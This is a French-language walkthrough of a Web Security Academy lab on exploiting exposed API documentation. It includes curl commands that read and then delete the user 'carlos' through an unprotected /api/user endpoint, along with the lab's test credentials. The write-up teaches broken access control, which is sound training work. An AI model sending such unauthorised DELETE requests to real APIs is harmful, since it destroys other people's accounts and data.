Exploitation d’un endpoint à l’aide de la documentation

Exploiting an API endpoint using documentation

Lab: Exploiting an API endpoint using documentation | Web Security AcademyWebSecAcademy

Objectif du laboratoire

L’objectif de ce laboratoire est de localiser une documentation d’API exposée, puis d’exploiter un endpoint afin de supprimer l’utilisateur carlos. Un compte valide est fourni pour effectuer les tests :

Identifiants : wiener:peter

Découverte de la documentation API

En explorant l’application, on identifie une route menant à une API REST contenant sa documentation. Cette documentation décrit clairement les endpoints disponibles et fournit même des exemples de requêtes prêtes à l’emploi, notamment sous forme de commandes curl.

Récupération des informations de l’utilisateur

À partir de la documentation, on observe qu’un endpoint permet de récupérer les informations d’un utilisateur en spécifiant son nom. La requête fournie permet d’obtenir les données de l’utilisateur carlos :

Requête :
- Méthode : GET
- Endpoint : /api/user/carlos

curl -vgw "\n" -X GET 'https://0a73004e0348a82c81d3ca78004c00f7.web-security-academy.net/api/user/carlos'

Réponse :
- Le serveur retourne un objet JSON contenant le nom d’utilisateur et son adresse email.

{
  "username": "carlos",
  "email": "[email protected]"
}

Suppression de l’utilisateur carlos

La documentation indique également qu’il est possible de supprimer un utilisateur via une requête dédiée. En utilisant l’endpoint correspondant avec la méthode appropriée :

Requête :
- Méthode : DELETE
- Endpoint : /api/user/carlos

curl -vgw "\n" -X DELETE 'https://0a73004e0348a82c81d3ca78004c00f7.web-security-academy.net/api/user/carlos' -d '{}'

Résultat :
- Le serveur accepte la requête et renvoie un message confirmant la suppression de l’utilisateur.

{
  "status": "User deleted"
}

Mis à jour il y a 1 mois

hashtagExploiting an API endpoint using documentation

Exploiting an API endpoint using documentation